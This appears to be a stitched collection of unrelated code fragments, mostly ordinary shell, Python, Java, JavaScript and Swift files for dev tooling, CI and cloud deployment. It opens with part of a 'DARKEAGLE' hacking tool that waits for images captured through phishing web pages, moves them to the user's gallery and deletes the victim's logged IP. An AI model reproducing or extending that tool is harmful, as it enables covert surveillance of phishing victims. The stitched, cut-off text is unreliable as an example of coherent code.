if [[ $ccode != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Currency code: \e[0m$ccode\e[0m"
fi
echo ""
imgrcv
}
imgrcv() {
echo " "
echo -e "\e[1;93m[\e[0m\e[34m•\e[0m\e[1;93m] Waiting For Image...\e[0m\n"
while [ true ]; do
if [[ -e "webs/$site/Log.log" ]]; then
echo -e "\e[1;92m[\e[34m•\e[1;92m] Image Recieved..."
sleep 6.0
mv -f webs/$site/*.png /sdcard > /dev/null 2>&1
echo " "
echo -e "\e[1;92m[\e[34m•\e[1;92m]\e[1;34m Image Moved To Gallery..."
rm webs/$site/ip.txt > /dev/null 2>&1
rm webs/$site/Log.log > /dev/null 2>&1
echo
echo -e "\e[92m---------------------\e[34mCHECK YOUR GALLERY\e[92m----------------------\e[0m"
echo
checkfound
fi
done
}
about() {
clear
echo -e '\e[96m ----------------'
echo -e '\e[92m ┌─┐┌┐ ┌─┐┬ ┬┌┬┐
├─┤├┴┐│ ││ │ │
┴ ┴└─┘└─┘└─┘ ┴ '
echo -e '\e[96m ----------------'
echo -e '\e[96m |------------------|'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 1.5
echo -e '\e[96m [\e[92m+\e[96m]-------[\e[92mDARKEAGLE\e[96m]'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 1.0
echo -e '\e[96m [\e[92m+\e[96m]-------[\e[92mTOOL\e[96m]'
echo -e '\e[96m |'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 2.0
echo -e '\e[96m [\e[92m+\e[96m]--------------'
echo -e '\e[96m |'
echo -e '\e[92m THIS TOOLS IS ONLY FOR EDUCATIONAL PURPOSE SO'
echo -e '\e[92m IM NOT RESPONSIBLE IF YOU DO ANY ILLEGAL THINGS'
echo -e '\e[92m THANKS FOR READING SUBSCRIBE {DARKNOOBHACKERS}'
echo -e '\e[92m HAVE A GOOD DAY BUDDIE :)'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 4.5
echo -e '\e[96m [\e[92m+\e[96m]------------[\e[92mBYE\e[96m]\e[0m'
sleep 2.0
cd $HOME/3rd-EYE
clear
bash 3rd-EYE.sh
}
banner
menu
|
# append to history file, don't overwrite it
setopt appendhistory
# automatically cd to directories matching command names
setopt autocd
# treat #, -, and ^ as filename glob patterns
setopt extendedglob
# print an error if filename expansion fails, instead of leaving it as-is
setopt nomatch
# DIE, FOUL BELL
unsetopt beep
# use vim keybindings
bindkey -v
# enable Ctrl-R history search like emacs mode
bindkey '^R' history-incremental-search-backward
# make zsh vi bindings more like vim
# permit deleting backwards from insert point
bindkey "^?" backward-delete-char
# ctrl-w deletes previous word
bindkey "^W" backward-kill-word
# ctrl-h also deletes the previous char
bindkey "^H" backward-delete-char
# ctrl-u deletes an entire line
bindkey "^U" backward-kill-line
# Specify custom dotfiles ZSH completion path
fpath=(~/.config/zsh/completion $fpath)
# Activate zsh completions engine
autoload bashcompinit && bashcompinit
autoload -Uz compinit && compinit
complete -C '/apollo/env/AmazonAwsCli/bin/aws_completer' aws
# enable fzf
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
|
#!/usr/bin/env bash
CURRENT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
online_option_string="@online_icon"
offline_option_string="@offline_icon"
ping_timeout_string="@ping_timeout"
route_to_ping_string="@route_to_ping"
online_icon_osx="✅ "
online_icon="✔"
offline_icon_osx="⛔️ "
offline_icon_cygwin="X"
offline_icon="❌ "
ping_timeout_default="3"
route_to_ping_default="www.google.com"
source $CURRENT_DIR/shared.sh
is_osx() {
[ $(uname) == "Darwin" ]
}
is_cygwin() {
[[ $(uname) =~ CYGWIN ]]
}
is_freebsd() {
[ $(uname) == FreeBSD ]
}
online_icon_default() {
if is_osx; then
echo "$online_icon_osx"
else
echo "$online_icon"
fi
}
offline_icon_default() {
if is_osx; then
echo "$offline_icon_osx"
elif is_cygwin; then
echo "$offline_icon_cygwin"
else
echo "$offline_icon"
fi
}
online_status() {
if is_osx || is_freebsd; then
local timeout_flag="-t"
else
local timeout_flag="-w"
fi
if is_cygwin; then
local number_pings_flag="-n"
else
local number_pings_flag="-c"
fi
local ping_timeout="$(get_tmux_option "$ping_timeout_string" "$ping_timeout_default")"
local ping_route="$(get_tmux_option "$route_to_ping_string" "$route_to_ping_default")"
ping "$number_pings_flag" 1 "$timeout_flag" "$ping_timeout" "$ping_route" >/dev/null 2>&1
}
print_icon() {
if $(online_status); then
printf "$(get_tmux_option "$online_option_string" "$(online_icon_default)")"
else
printf "$(get_tmux_option "$offline_option_string" "$(offline_icon_default)")"
fi
}
main() {
print_icon
}
main
|
#!/bin/sh
gpg --batch --use-agent --decrypt ~/.vault_key.gpg
|
/**
* Created by <EMAIL> on 2019/3/18.
*/
import "./style.less";
import React,{PureComponent} from 'react';
import extensionizer from 'extensionizer';
import popup from "../../../../../popup";
export default class More extends PureComponent{
constructor(props){
super(props);
}
render(){
const {locale,moreClass,onShowAccount,onRemove} = this.props;
const {app:{network},account:{current}} = this.props.state;
return (
<ul className={moreClass}>
<li>
<a onClick={()=>{
onShowAccount && onShowAccount();
}}>
<i className="fa icon-detail"/>
{locale.account_info}
</a>
</li>
{
network.explorer ?
<li>
<a onClick={()=>{
const url = `${network.explorer}/address/${current}?locale=${locale.key}`;
if(extensionizer.storage){
popup.messageToBackground("redirect",{url:url});
}
else{
window.open(url);
}
}}>
<i className="fa icon-copy-o"/>
{locale.view_from_youchain}
</a>
</li> : null
}
<li>
<a onClick={()=>{
onRemove && onRemove();
}}>
<i className="fa icon-delete"/>
{locale.account_remove}
</a>
</li>
</ul>
)
}
}
|
#!/bin/bash
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
set -e -o pipefail
HERE=$(cd $(dirname $0); pwd)
cd "$HERE"
# Optional --cleanup flag: drop the test namespace after a successful run.
CLEAN_ON_SUCCESS=
if [ "$1" == "--cleanup" ]; then
    CLEAN_ON_SUCCESS="--cleanup"
    shift
fi
ROOT=$(cd ../..; pwd)
PATH="${ROOT}:${PATH}"
# utils.sh provides check_rbac, initialize_namespace, wait_for_pods,
# cluster_ip, service_port, wait_for_ready, check_diag, check_listeners,
# drop_namespace.
source ${ROOT}/utils.sh
check_rbac
initialize_namespace "008-cacert"
kubectl cluster-info
# Rewrite the stock ambassador deployment for this test's namespace.
python ${ROOT}/yfix.py ${ROOT}/fixes/test-dep.yfix \
       ${ROOT}/ambassador-deployment.yaml \
       k8s/ambassador-deployment.yaml \
       008-cacert \
       008-cacert
# create secrets for TLS stuff
kubectl create -n 008-cacert secret tls ambassador-certs --cert=certs/server.crt --key=certs/server.key
kubectl create -n 008-cacert secret generic ambassador-cacert --from-file=tls.crt=certs/client.crt
# --from-literal=cert_required=true
kubectl apply -f k8s/rbac.yaml
kubectl apply -f k8s/ambassador.yaml
kubectl apply -f k8s/ambassador-deployment.yaml
# kubectl run demotest -n 008-cacert --image=dwflynn/demotest:0.0.1 -- /bin/sh -c "sleep 3600"
# From here on failures are handled explicitly via the checks below, so
# errexit/pipefail are turned back off.
set +e +o pipefail
wait_for_pods 008-cacert
CLUSTER=$(cluster_ip)
APORT=$(service_port ambassador 008-cacert)
# DEMOTEST_POD=$(demotest_pod)
BASEURL="https://${CLUSTER}:${APORT}"
echo "Base URL $BASEURL"
echo "Diag URL $BASEURL/ambassador/v0/diag/"
wait_for_ready "$BASEURL"
if ! check_diag "$BASEURL" 1 "no services but TLS"; then
    exit 1
fi
if ! check_listeners "$BASEURL" 1 "no services but TLS"; then
    exit 1
fi
if [ -n "$CLEAN_ON_SUCCESS" ]; then
    drop_namespace 008-cacert
fi
|
#!/bin/sh
#
# Vivado(TM)
# runme.sh: a Vivado-generated Runs Script for UNIX
# Copyright 1986-2018 Xilinx, Inc. All Rights Reserved.
#
echo "This script was generated under a different operating system."
echo "Please update the PATH and LD_LIBRARY_PATH variables below, before executing this script"
# NOTE(review): this early exit is intentional — the PATH entries below are
# Windows-style (drive letters, ';' separators) and must be edited for UNIX
# before the exit line is removed.
exit
if [ -z "$PATH" ]; then
  PATH=C:/Xilinx/SDK/2018.2/bin;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/bin/nt64;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/lib/nt64:C:/Xilinx/Vivado/2018.2/bin
else
  PATH=C:/Xilinx/SDK/2018.2/bin;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/bin/nt64;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/lib/nt64:C:/Xilinx/Vivado/2018.2/bin:$PATH
fi
export PATH
if [ -z "$LD_LIBRARY_PATH" ]; then
  LD_LIBRARY_PATH=
else
  LD_LIBRARY_PATH=:$LD_LIBRARY_PATH
fi
export LD_LIBRARY_PATH
HD_PWD='C:/ECTE433_LabFiles/sampleRNN_GRU/sampleRNN_GRU.runs/impl_1'
cd "$HD_PWD"
HD_LOG=runme.log
/bin/touch $HD_LOG
ISEStep="./ISEWrap.sh"
# Run one implementation step through ISEWrap.sh, appending to the log;
# abort the whole run if the step fails.
EAStep()
{
     $ISEStep $HD_LOG "$@" >> $HD_LOG 2>&1
     if [ $? -ne 0 ]
     then
         exit
     fi
}
# pre-commands:
/bin/touch .init_design.begin.rst
EAStep vivado -log sampleRNN_GRU_wrapper.vdi -applog -m64 -product Vivado -messageDb vivado.pb -mode batch -source sampleRNN_GRU_wrapper.tcl -notrace
|
#!/bin/bash
# Run the measure-system benchmark under MPI (2 ranks) and tee the output
# into ~/tempi_results/measure_system.txt.
set -eou pipefail

# Quote the paths so a $HOME containing spaces doesn't word-split.
DIR="$HOME/tempi_results"
OUT="$DIR/measure_system.txt"
set -x
mkdir -p "$DIR"
echo "" > "$OUT"
#MPIRUN="$HOME/software/mvapich2-2.3.4/bin/mpirun -n 2"
MPIRUN="$HOME/software/openmpi-4.0.5/bin/mpirun -n 2"
# MPIRUN is intentionally unquoted: it must word-split into command + args.
$MPIRUN ../../build/bin/measure-system | tee -a "$OUT"
|
#!/bin/bash
echo "
##############################################################################################################
#
# FortiGate Azure deployment using ARM Template
# Multi HUB - Fortigate Active/Passive cluster with Azure Route Server
#
##############################################################################################################
"
# set +e: do NOT stop on error — the az exit codes are checked explicitly
# below so validation/deployment failures can print a message before exiting.
set +e
# Each input below can be pre-seeded via a DEPLOY_* environment variable;
# otherwise the user is prompted and a default is applied on empty input.
if [ -z "$DEPLOY_LOCATION_A" ]
then
  # Input location
  echo -n "Enter HUB A location (e.g. westeurope): "
  stty_orig=`stty -g` # save original terminal setting.
  read locationa # read the location
  stty $stty_orig # restore terminal setting.
  if [ -z "$locationa" ]
  then
    locationa="westeurope"
  fi
else
  locationa="$DEPLOY_LOCATION_A"
fi
echo ""
echo "--> Deployment HUB A in '$locationa' location ..."
echo ""
if [ -z "$DEPLOY_LOCATION_B" ]
then
  # Input location
  echo -n "Enter HUB B location (e.g. eastus2): "
  stty_orig=`stty -g` # save original terminal setting.
  read locationb # read the location
  stty $stty_orig # restore terminal setting.
  if [ -z "$locationb" ]
  then
    locationb="eastus2"
  fi
else
  locationb="$DEPLOY_LOCATION_B"
fi
echo ""
echo "--> Deployment HUB B in '$locationb' location ..."
echo ""
if [ -z "$DEPLOY_PREFIX" ]
then
  # Input prefix
  echo -n "Enter prefix: "
  stty_orig=`stty -g` # save original terminal setting.
  read prefix # read the prefix
  stty $stty_orig # restore terminal setting.
  if [ -z "$prefix" ]
  then
    prefix="FORTI"
  fi
else
  prefix="$DEPLOY_PREFIX"
fi
echo ""
echo "--> Using prefix '$prefix' for all resources ..."
echo ""
rg="$prefix-RG"
if [ -z "$DEPLOY_USERNAME" ]
then
  # Input username
  echo -n "Enter username: "
  stty_orig=`stty -g` # save original terminal setting.
  read USERNAME # read the prefix
  stty $stty_orig # restore terminal setting.
  if [ -z "$USERNAME" ]
  then
    USERNAME="azureuser"
  fi
else
  USERNAME="$DEPLOY_USERNAME"
fi
echo ""
echo "--> Using username '$USERNAME' ..."
echo ""
if [ -z "$DEPLOY_PASSWORD" ]
then
  # Input password
  echo -n "Enter password: "
  stty_orig=`stty -g` # save original terminal setting.
  stty -echo # turn-off echoing so the password isn't shown while typed.
  read PASSWORD # read the password
  stty $stty_orig # restore terminal setting.
else
  PASSWORD="$DEPLOY_PASSWORD"
  echo ""
  echo "--> Using password found in env variable DEPLOY_PASSWORD ..."
  echo ""
fi
# Create resource group
echo ""
echo "--> Creating $rg resource group ..."
az group create --location "$locationa" --name "$rg"
# Validate template
echo "--> Validation deployment in $rg resource group ..."
az deployment group validate --resource-group "$rg" \
                             --template-file azuredeploy.json \
                             --parameters adminUsername="$USERNAME" adminPassword="$PASSWORD" fortiGateNamePrefix=$prefix \
                                          hubALocation="$locationa" hubBLocation="$locationb"
result=$?
if [ $result != 0 ];
then
  echo "--> Validation failed ..."
  exit $result;
fi
# Deploy resources
echo "--> Deployment of $rg resources ..."
az deployment group create --resource-group "$rg" \
                           --template-file azuredeploy.json \
                           --parameters adminUsername="$USERNAME" adminPassword="$PASSWORD" fortiGateNamePrefix=$prefix \
                                        hubALocation="$locationa" hubBLocation="$locationb"
result=$?
if [[ $result != 0 ]];
then
  echo "--> Deployment failed ..."
  exit $result;
else
  echo "
##############################################################################################################
#
# FortiGate Azure deployment using ARM Template
# Fortigate Active/Passive cluster with Azure Route Server
#
# The FortiGate systems is reachable via the management public IP addresses of the firewall
# on HTTPS/443 and SSH/22.
#
##############################################################################################################
Deployment information:
Username: $USERNAME
FortiGate IP addesses
"
  query="[?virtualMachine.name.starts_with(@, '$prefix')].{virtualMachine:virtualMachine.name, publicIP:virtualMachine.network.publicIpAddresses[0].ipAddress,privateIP:virtualMachine.network.privateIpAddresses[0]}"
  az vm list-ip-addresses --query "$query" --output tsv
  echo "
IP Public Azure Load Balancer:"
  publicIpIds=$(az network lb show -g "$rg" -n "$prefix-ExternalLoadBalancer" --query "frontendIpConfigurations[].publicIpAddress.id" --out tsv)
  # One public IP id per line; resolve each to its address + FQDN.
  while read publicIpId; do
    az network public-ip show --ids "$publicIpId" --query "{ ipAddress: ipAddress, fqdn: dnsSettings.fqdn }" --out tsv
  done <<< "$publicIpIds"
  echo "
##############################################################################################################
"
fi
exit 0
|
<reponame>DinhLantstk789/codelibrary<filename>java/structures/DisjointSetsRank.java
package structures;
/**
 * Disjoint-set (union-find) structure with union by rank and path
 * compression; near-constant amortized time per operation.
 */
public class DisjointSetsRank {
    // Parent links; p[i] == i marks a root.
    int[] p;
    // Upper bound on the height of the tree rooted at each node.
    int[] rank;

    /** Creates {@code size} singleton sets, each element its own root. */
    public DisjointSetsRank(int size) {
        p = new int[size];
        rank = new int[size];
        for (int i = 0; i < size; i++) {
            p[i] = i;
        }
    }

    /** Returns the representative of x's set, compressing the path walked. */
    public int root(int x) {
        // First pass: locate the root.
        int r = x;
        while (r != p[r]) {
            r = p[r];
        }
        // Second pass: point every node on the path directly at the root,
        // same final parent links as the recursive formulation.
        while (x != r) {
            int next = p[x];
            p[x] = r;
            x = next;
        }
        return r;
    }

    /** Merges the sets containing a and b (no-op if already merged). */
    public void unite(int a, int b) {
        int ra = root(a);
        int rb = root(b);
        if (ra == rb) {
            return;
        }
        // Attach the lower-ranked root under the higher-ranked one; on a tie
        // the first argument's root wins and its rank grows, matching the
        // original branch structure exactly.
        if (rank[ra] < rank[rb]) {
            int tmp = ra;
            ra = rb;
            rb = tmp;
        }
        p[rb] = ra;
        if (rank[ra] == rank[rb]) {
            ++rank[ra];
        }
    }

    // Usage example: prints "true" twice.
    public static void main(String[] args) {
        DisjointSetsRank ds = new DisjointSetsRank(10);
        System.out.println(false == (ds.root(0) == ds.root(9)));
        ds.unite(0, 9);
        System.out.println(true == (ds.root(0) == ds.root(9)));
    }
}
|
#! /bin/bash
# This script is used by cloud build to push Docker images into Docker hub
# Tag the locally built GCR images ($SHORT_SHA) with the given tag and push
# both the graph-node and graph-node-debug images to Docker Hub.
tag_and_push() {
    tag=$1
    docker tag gcr.io/$PROJECT_ID/graph-node:$SHORT_SHA \
               graphprotocol/graph-node:$tag
    docker push graphprotocol/graph-node:$tag

    docker tag gcr.io/$PROJECT_ID/graph-node-debug:$SHORT_SHA \
               graphprotocol/graph-node-debug:$tag
    docker push graphprotocol/graph-node-debug:$tag
}
echo "Logging into Docker Hub"
# NOTE(review): password comes from $PASSWORD while the username comes from
# $DOCKER_HUB_USER — confirm both env vars are supplied by the build config.
echo $PASSWORD | docker login --username="$DOCKER_HUB_USER" --password-stdin
set -ex
tag_and_push "$SHORT_SHA"
# Builds of tags set the tag in Docker Hub, too
[ -n "$TAG_NAME" ] && tag_and_push "$TAG_NAME"
# Builds for tags vN.N.N become the 'latest'
[[ "$TAG_NAME" =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]] && tag_and_push latest
# Explicit exit 0 so a false guard on the last [[ ]] doesn't fail the build.
exit 0
|
import os
class CustomLogger:
    """Appends reset/step event records to ``<out_dir>/<filename_header>_log.txt``.

    Args:
        out_dir: directory receiving the log file (created if missing).
        render: when True, also print a rendering message for each event.
        filename_header: prefix for the log file name.
    """

    def __init__(self, out_dir, render, filename_header):
        self.out_dir = out_dir
        self.render = render
        self.filename_header = filename_header
        # Fix: create the output directory up front; previously the first
        # append in on_reset/on_step raised FileNotFoundError if it was absent.
        os.makedirs(out_dir, exist_ok=True)
        self.log_file = os.path.join(out_dir, f"{filename_header}_log.txt")

    def on_reset(self, obs, image_frame):
        """Log a reset event; obs/image details are recorded only when obs is
        not None (image_frame alone is never written), mirroring the original
        behavior."""
        with open(self.log_file, 'a') as file:
            file.write("Reset event logged\n")
            if obs is not None:
                file.write(f"Obs: {obs}\n")
                file.write(f"Image frame: {image_frame}\n")
        if self.render:
            print("Rendering environment for reset event")

    def on_step(self, action):
        """Log a step event with the action that was taken."""
        with open(self.log_file, 'a') as file:
            file.write(f"Step event logged - Action: {action}\n")
        if self.render:
            print("Rendering environment for step event")
# Demonstration of usage
out_dir = "logs"
render = True
filename_header = "custom"
# NOTE(review): this writes to ./logs relative to the CWD and assumes the
# directory is present/creatable — confirm for the deployment environment.
logger = CustomLogger(out_dir=out_dir, render=render, filename_header=filename_header)
logger.on_reset(obs=None, image_frame="Generated image frame 1")
# Log five step events with actions 1..5.
for i in range(1, 6):
    logger.on_step(action=i)
import os
import sys
import argparse
import csv
def extract_built_residues(pdb_file):
    """Extract information about the built residues from a PDB file.

    Placeholder implementation: the original function had no body at all,
    which made the whole module a SyntaxError. Until the parsing logic is
    implemented it returns an empty list, so generate_csv_report produces a
    header-only CSV.

    :param pdb_file: path to the PDB file to inspect
    :return: list of dicts, each with at least 'name' and 'number' keys
        (the keys consumed by generate_csv_report)
    """
    # TODO: parse ATOM/HETATM records from pdb_file and populate the list.
    return []
def generate_csv_report(pdb_files):
    """Write one ``<pdb>_report.csv`` next to each input PDB, listing its
    built residues (one row per residue, plus a header row).

    :param pdb_files: iterable of PDB file paths
    """
    for pdb_file in pdb_files:
        built_residues = extract_built_residues(pdb_file)
        # Report file sits next to the input: foo.pdb -> foo_report.csv
        csv_file_name = os.path.splitext(pdb_file)[0] + '_report.csv'
        with open(csv_file_name, 'w', newline='') as csvfile:
            fieldnames = ['PDB File', 'Residue Name', 'Residue Number'] # Add more fields as needed
            writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
            writer.writeheader()
            # Each residue dict is expected to provide 'name' and 'number'.
            for residue in built_residues:
                writer.writerow({'PDB File': pdb_file, 'Residue Name': residue['name'], 'Residue Number': residue['number']}) # Update with actual keys and values
def main():
    """CLI entry point: generate a CSV report for each PDB named on argv,
    or print usage when invoked with no arguments."""
    progname = os.path.basename(sys.argv[0])
    usage = progname + """ [options] <pdbs>
Given pdb files, report the built residues in csv files.
"""
    # Removed the unused `args_def = {}` local from the original.
    parser = argparse.ArgumentParser()
    parser.add_argument("pdb", nargs='*', help="specify pdbs to be processed")
    args = parser.parse_args()
    if len(sys.argv) == 1:
        # No arguments at all: show usage instead of silently doing nothing.
        print("usage: " + usage)
    else:
        generate_csv_report(args.pdb)

if __name__ == "__main__":
    main()
#!/bin/ksh
# Description :
# A simple script to update the local(gif) tunnel with the new WAN IP
# and also update HE(tunnelbroker) with the new end point IP
# This also depends on a line in /etc/rc.local :
# "/sbin/ifconfig ix0 | grep inet | cut -c 7-21 | xargs > /tmp/.wan-ip"
# where ix0 is my WAN interface
### Variables that must be set ###
###
# HE tunnel endpoint
HE_tunnel_end=""
# HE username
HE_user_name=""
# HE update key
HE_update_key=""
# HE tunnel ID
HE_tunnel_id=""
# Local WAN interface
wan_interface=""
# Local interface for tunnel
tunnel_interface=""
###
### End variables ###
# WAN IP on system boot
wan_ip=`cat /tmp/.wan-ip`
# Current WAN IP from adaptor
ifconfig $wan_interface | grep inet | cut -c 7-21 | xargs > /tmp/ip
current_wan_ip=`cat /tmp/ip`
# Check to see if the WAN IP has changed
# (diff exit status: 0 = files identical, non-zero = IP changed)
ip_diff_check=`diff -s /tmp/.wan-ip /tmp/ip`
returncode_ip_diff_check=`echo $?`
# If changed, then update the tunnel and update HE, if no change exit and log msg to syslog
if [ $returncode_ip_diff_check != 0 ]; then
    # Rewrite the first line of the tunnel interface's hostname file with the
    # new local endpoint, then restart just that interface.
    sed -i "1 s/^.*$/tunnel $current_wan_ip $HE_tunnel_end/g" /etc/hostname.$tunnel_interface
    /bin/sh /etc/netstart $tunnel_interface
    # Tell tunnelbroker.net about the new endpoint (HTTP basic auth in URL).
    curl -s "https://$HE_user_name:$HE_update_key@ipv4.tunnelbroker.net/nic/update?hostname=$HE_tunnel_id"
    logger "Updated HE tunnel with new local IP $current_wan_ip"
    # Remember the new IP for the next comparison.
    mv /tmp/ip /tmp/.wan-ip
else
    logger "No update needed for HE IPV6 tunnel"
    exit 0
fi
|
#!/bin/bash
# Copyright 2021 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -x -o pipefail
# Make sure docker is installed and configured
./hack/jenkins/installers/check_install_docker.sh
yes|gcloud auth configure-docker
docker login -u ${DOCKERHUB_USER} -p ${DOCKERHUB_PASS}
# Make sure gh is installed and configured
./hack/jenkins/installers/check_install_gh.sh
# Let's make sure we have the newest kicbase reference
curl -L https://github.com/kubernetes/minikube/raw/master/pkg/drivers/kic/types.go --output types-head.go
# kicbase tags are of the form VERSION-TIMESTAMP-PR, so this grep finds that TIMESTAMP in the middle
# if it doesn't exist, it will just return VERSION, which is covered in the if statement below
HEAD_KIC_TIMESTAMP=$(egrep "Version =" types-head.go | cut -d \" -f 2 | cut -d "-" -f 2)
CURRENT_KIC_TS=$(egrep "Version =" pkg/drivers/kic/types.go | cut -d \" -f 2 | cut -d "-" -f 2)
if [[ $HEAD_KIC_TIMESTAMP != v* ]]; then
    diff=$((CURRENT_KIC_TS-HEAD_KIC_TIMESTAMP))
    if [[ $CURRENT_KIC_TS == v* ]] || [ $diff -lt 0 ]; then
        gh pr comment ${ghprbPullId} --body "Hi ${ghprbPullAuthorLoginMention}, your kicbase info is out of date. Please rebase."
        exit 1
    fi
fi
rm types-head.go
# Setup variables
if [[ -z $KIC_VERSION ]]; then
    # Testing PRs here
    release=false
    now=$(date +%s)
    KV=$(egrep "Version =" pkg/drivers/kic/types.go | cut -d \" -f 2 | cut -d "-" -f 1)
    GCR_REPO=gcr.io/k8s-minikube/kicbase-builds
    DH_REPO=docker.io/kicbase/build
    export KIC_VERSION=$KV-$now-$ghprbPullId
else
    # Actual kicbase release here
    release=true
    GCR_REPO=${GCR_REPO:-gcr.io/k8s-minikube/kicbase}
    DH_REPO=${DH_REPO:-docker.io/kicbase/stable}
    export KIC_VERSION
fi
GCR_IMG=${GCR_REPO}:${KIC_VERSION}
DH_IMG=${DH_REPO}:${KIC_VERSION}
export KICBASE_IMAGE_REGISTRIES="${GCR_IMG} ${DH_IMG}"
# Build a new kicbase image
CIBUILD=yes make push-kic-base-image | tee kic-logs.txt
# Abort with error message if above command failed
# ($? reflects the make, not the tee, because of `set -o pipefail` above)
ec=$?
if [ $ec -gt 0 ]; then
    if [ "$release" = false ]; then
        gh pr comment ${ghprbPullId} --body "Hi ${ghprbPullAuthorLoginMention}, building a new kicbase image failed.
See the logs at: https://storage.cloud.google.com/minikube-builds/logs/${ghprbPullId}/${ghprbActualCommit::7}/kic_image_build.txt
"
    fi
    exit $ec
fi
# Retrieve the sha from the new image
docker pull $GCR_IMG
fullsha=$(docker inspect --format='{{index .RepoDigests 0}}' $GCR_IMG)
sha=$(echo ${fullsha} | cut -d ":" -f 2)
git config user.name "minikube-bot"
git config user.email "minikube-bot@google.com"
if [ "$release" = false ]; then
    # Update the user's PR with the newly built kicbase image.
    git remote add ${ghprbPullAuthorLogin} git@github.com:${ghprbPullAuthorLogin}/minikube.git
    git fetch ${ghprbPullAuthorLogin}
    git checkout -b ${ghprbPullAuthorLogin}-${ghprbSourceBranch} ${ghprbPullAuthorLogin}/${ghprbSourceBranch}
    sed -i "s|Version = .*|Version = \"${KIC_VERSION}\"|;s|baseImageSHA = .*|baseImageSHA = \"${sha}\"|;s|gcrRepo = .*|gcrRepo = \"${GCR_REPO}\"|;s|dockerhubRepo = .*|dockerhubRepo = \"${DH_REPO}\"|" pkg/drivers/kic/types.go; make generate-docs;
    git commit -am "Updating kicbase image to ${KIC_VERSION}"
    # Fix: branch on the push itself. Previously the script ran `git push`,
    # assigned the success message, and only then tested $? — which by then
    # held the (always zero) status of the assignment, so the failure message
    # was unreachable.
    if git push ${ghprbPullAuthorLogin} HEAD:${ghprbSourceBranch}; then
        message="Hi ${ghprbPullAuthorLoginMention}, we have updated your PR with the reference to newly built kicbase image. Pull the changes locally if you want to test with them or update your PR further."
    else
        message="Hi ${ghprbPullAuthorLoginMention}, we failed to push the reference to the kicbase to your PR. Please run the following command and push manually.
sed -i 's|Version = .*|Version = \"${KIC_VERSION}\"|;s|baseImageSHA = .*|baseImageSHA = \"${sha}\"|;s|gcrRepo = .*|gcrRepo = \"${GCR_REPO}\"|;s|dockerhubRepo = .*|dockerhubRepo = \"${DH_REPO}\"|' pkg/drivers/kic/types.go
"
    fi
    gh pr comment ${ghprbPullId} --body "${message}"
else
    # We're releasing, so open a new PR with the newly released kicbase
    branch=kicbase-release-${KIC_VERSION}
    git checkout -b ${branch}
    sed -i "s|Version = .*|Version = \"${KIC_VERSION}\"|;s|baseImageSHA = .*|baseImageSHA = \"${sha}\"|;s|gcrRepo = .*|gcrRepo = \"${GCR_REPO}\"|;s|dockerhubRepo = .*|dockerhubRepo = \"${DH_REPO}\"|" pkg/drivers/kic/types.go
    make generate-docs
    git add pkg/drivers/kic/types.go site/content/en/docs/commands/start.md
    git commit -m "Update kicbase to ${KIC_VERSION}"
    git remote add minikube-bot git@github.com:minikube-bot/minikube.git
    git push -f minikube-bot ${branch}
    gh pr create --fill --base master --head minikube-bot:${branch}
fi
|
import UIKit
class CustomDrawingViewController: UIViewController {
    // Container for the popover menu and the main (left) toolbar, plus the
    // button that anchors the popover and the stack view holding its tools.
    let rectanglePopoverParent = UIView()
    let leftToolbarParent = UIView()
    let rectangleButton = UIButton()
    let rectanglePopoverToolbar = UIStackView()
    override func viewDidLoad() {
        super.viewDidLoad()
        // Create and position popover menu relative to the main toolbar
        // NOTE(review): none of these views are added to a superview here and
        // translatesAutoresizingMaskIntoConstraints is not disabled — confirm
        // the view hierarchy is assembled elsewhere before these constraints
        // are activated.
        let leadingConstraint = rectanglePopoverParent.leadingAnchor.constraint(equalTo: leftToolbarParent.trailingAnchor, constant: 2)
        let topConstraint = rectanglePopoverParent.topAnchor.constraint(equalTo: rectangleButton.topAnchor, constant: 0)
        let widthConstraint = rectanglePopoverParent.widthAnchor.constraint(equalTo: leftToolbarParent.widthAnchor, constant: 0)
        let heightConstraint = rectanglePopoverParent.heightAnchor.constraint(equalTo: rectangleButton.heightAnchor, multiplier: 2)
        NSLayoutConstraint.activate([leadingConstraint, topConstraint, widthConstraint, heightConstraint])
        // Set the axis and distribution of the toolbar
        rectanglePopoverToolbar.axis = .vertical
        rectanglePopoverToolbar.distribution = .fillEqually
        // Add tap gesture recognizer to the toolbar
        // cancelsTouchesInView = false so taps still reach the buttons inside.
        let tapGesture = UITapGestureRecognizer(target: self, action: #selector(rectanglePopoverTapHandler(gesture:)))
        tapGesture.cancelsTouchesInView = false
        rectanglePopoverToolbar.addGestureRecognizer(tapGesture)
        // Create a button with an image for a filled rectangle
        // NOTE(review): the button is created but never added to the popover
        // toolbar here — confirm it is attached elsewhere.
        let rectangleFilledImage = UIImage(named: "RectangleFilled.pdf")
        let rectangleFilledButton = UIButton()
        rectangleFilledButton.setImage(rectangleFilledImage, for: .normal)
    }
    @objc func rectanglePopoverTapHandler(gesture: UITapGestureRecognizer) {
        // Handle tap gesture for selecting drawing tools
    }
}
#!/bin/bash
# SPDX-license-identifier: Apache-2.0
##############################################################################
# Copyright (c) 2019
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
